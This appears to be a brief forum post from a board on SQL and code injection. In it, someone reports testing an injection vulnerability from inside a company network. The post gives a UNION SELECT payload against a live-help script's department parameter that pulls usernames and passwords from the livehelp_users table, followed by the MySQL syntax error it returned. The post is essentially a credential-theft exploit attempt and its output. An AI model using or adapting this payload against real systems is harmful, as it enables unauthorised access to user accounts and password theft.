UPDATE
Testing this vul from inside the company network i get different result with my "real-code" in this case not http 500 error. This.
is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat (username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/*
output on screen:
( 1064 : You have an error in your SQL syntax; check the manual that correspond
Forum:
SQL and Code Injection